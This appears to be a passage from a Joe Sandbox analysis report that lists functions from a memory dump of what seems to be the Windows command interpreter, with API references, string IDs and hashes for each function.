                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                              • API String ID: 3637805771-3100821235
                                                                              • Opcode ID: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                                                                              • Instruction ID: 83a7e7f27ac188611b9aebc2f1b1e6f3ae2e835edcec355c415a0ec71417a2e2
                                                                              • Opcode Fuzzy Hash: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                                                                              • Instruction Fuzzy Hash: 79E17C71A1CA52CAE718BF65E804179FAA1FB4DB95B449230CE2E937B6DF3CA414C700
                                                                              Function 00007FF64B567650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                              • String ID: DPATH
                                                                              • API String ID: 95024817-2010427443
                                                                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                              • Instruction ID: 4de6f78255b210c9331bfb03ba7288cb6cbac465ebd0f62c11b3d2979a7742ad
                                                                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                              • Instruction Fuzzy Hash: DA127F72A1C68286EB68BF15E440179FAA1FB8D754F445135EE6E977B6DF3CE8008B00
                                                                              Function 00007FF64B565240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: [...]$ [..]$ [.]$...$:
                                                                              • API String ID: 0-1980097535
                                                                              • Opcode ID: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                                                                              • Instruction ID: 849d28c83ed692dfa41bb31a3427872a920a04e22352d550ad91b84bbf1519b1
                                                                              • Opcode Fuzzy Hash: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                                                                              • Instruction Fuzzy Hash: 8A329E72A1C78286EB68FF25E5402F9B7A0EB4D784F409135DA2D876A6DF3CE545C700
                                                                              Function 00007FF64B58EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcsupr.MSVCRT ref: 00007FF64B58EF33
                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EF98
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EFA9
                                                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EFBF
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF64B58EFDC
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58EFED
                                                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F003
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F022
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F083
                                                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F092
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F0A5
                                                                              • towupper.MSVCRT ref: 00007FF64B58F0DB
                                                                              • wcschr.MSVCRT ref: 00007FF64B58F135
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F16C
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B58F185
                                                                                • Part of subcall function 00007FF64B5701B8: _get_osfhandle.MSVCRT ref: 00007FF64B5701C4
                                                                                • Part of subcall function 00007FF64B5701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF64B57E904,?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B5701D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                              • String ID: <noalias>$CMD.EXE
                                                                              • API String ID: 1161012917-1690691951
                                                                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                              • Instruction ID: c6f7732fa913ecc4eabd685980108612098e441493d48bc4e7b41787c3bd4977
                                                                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                              • Instruction Fuzzy Hash: FB919E61B1D652CAFB19BF60E8001BDBAA0AF4DB54F488535DD2E826F6EF3CA4558310
                                                                              Function 00007FF64B566EE4 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                              • API String ID: 4111365348-4023967598
                                                                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                              • Instruction ID: 56eaca8967e698e2f0e7421b6565be74eb2667748ddab9bf803b72348dbae822
                                                                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                              • Instruction Fuzzy Hash: 04E1BD61A0C64286EB18BF68E8402B9E6A1FB4C784F545132DE2ED76B6EF3CE544C740
                                                                              Function 00007FF64B5632B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B5632F3
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF64B5632A4), ref: 00007FF64B563309
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF64B563384
                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B5811DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                              • String ID:
                                                                              • API String ID: 611521582-0
                                                                              • Opcode ID: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                                                                              • Instruction ID: f32850567fa681843f6163d2ac266a28dda948b052cbc68ed2e68ee366fc2278
                                                                              • Opcode Fuzzy Hash: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                                                                              • Instruction Fuzzy Hash: EFA18D62B1C612CAEB18BF65E8042BDE7A1BB4CB55F445135CD2E877A2DF3CA445C700
                                                                              Function 00007FF64B563410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                              • String ID: $Application$System
                                                                              • API String ID: 3538039442-1881496484
                                                                              • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                              • Instruction ID: 8b7655ad0995705079f61c8dfd876facb16502650f6151eb71ee8f1d67263b1c
                                                                              • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                              • Instruction Fuzzy Hash: FB517872A0CB41D6EA28BF15F40467AFAA1FB8DB44F449134DA6E837A6DF3CD4558700
                                                                              Function 00007FF64B56372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                              • String ID: COPYCMD$\
                                                                              • API String ID: 3989487059-1802776761
                                                                              • Opcode ID: 96accb7c683da629c5902687fcfdce68ec2ad7ffcff5cd83664200e6c3670c7a
                                                                              • Instruction ID: d23267da223f3177cdc7264bb2459d0bcb305b54b112c621c2219d8d5747a87d
                                                                              • Opcode Fuzzy Hash: 96accb7c683da629c5902687fcfdce68ec2ad7ffcff5cd83664200e6c3670c7a
                                                                              • Instruction Fuzzy Hash: 52F1A365B0D74686EA58BF15D4402BAA3A0FF4DB88F049135CA6E877B6EF3CE456C700
                                                                              Function 00007FF64B56B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _get_osfhandlememset$wcschr
                                                                              • String ID: DPATH
                                                                              • API String ID: 3260997497-2010427443
                                                                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                              • Instruction ID: aeded69d1deff569d6c27c772e4ccf758eb877cdf12b650f04daa57d632840d1
                                                                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                              • Instruction Fuzzy Hash: B6D16E62A0C64286EA28BF65D44127DA3A1FF4CB94F049235DA3D877F6DF7CE8428740
                                                                              Function 00007FF64B577FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                              • String ID: @P
                                                                              • API String ID: 1801357106-3670739982
                                                                              • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                              • Instruction ID: b981e3402924b73629449f4e0b3a5054bb53462ff947af1bb44ddc96a7433e42
                                                                              • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                              • Instruction Fuzzy Hash: AC416C72B08A45DBE714BF65E4402EDBBA0FB8D748F448231DA2D87AA9DF78D504C750
                                                                              Function 00007FF64B57823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileFindFirstLast
                                                                              • String ID:
                                                                              • API String ID: 873889042-0
                                                                              • Opcode ID: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                                                                              • Instruction ID: 1a5e6a20f65ea1444c3ba0a994107923bf927ef6258784a60b42afbdfa6940ca
                                                                              • Opcode Fuzzy Hash: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                                                                              • Instruction Fuzzy Hash: D9512A75A0DB46C6E708BF16E844579BBA0FB4DB82F448131CA2E933B2DF7CE4548A00
                                                                              Function 00007FF64B58AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValue$CreateDeleteOpen
                                                                              • String ID: %s=%s$\Shell\Open\Command
                                                                              • API String ID: 4081037667-3301834661
                                                                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                              • Instruction ID: 73a72cd1bf253df1d56617c743745bac20c171e6c144ddcacd44bd31db096e6d
                                                                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                              • Instruction Fuzzy Hash: DD71B061B1DA8282FB28BF25E0502B9E2A1FF8D790F444531DA6EC77A6DF3CD4528700
                                                                              Function 00007FF64B561884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmpwcsrchr
                                                                              • String ID: COPYCMD
                                                                              • API String ID: 2429825313-3727491224
                                                                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                              • Instruction ID: 9c3c85710a87eb6f2cced68a4cbcd21a63bfa51a226422d846a0e77a8591a17a
                                                                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                              • Instruction Fuzzy Hash: EDF19461F1C65286FB68BF61D0402BDB2A1AF0C798F046235DE6DA36F6DE3CA461C750
                                                                              Function 00007FF64B58BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                              • String ID:
                                                                              • API String ID: 3476366620-0
                                                                              • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                              • Instruction ID: 395d03e1ad5f49c723992d21ad1e0c11ce3f5d2faa81067370a8d41c44f4856e
                                                                              • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                              • Instruction Fuzzy Hash: EA21AA6091DA42E6FA1C7F20E8153B8E695FF4EB15F845235C57E822F3DF3DA4158610
                                                                              Function 00007FF64B563D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
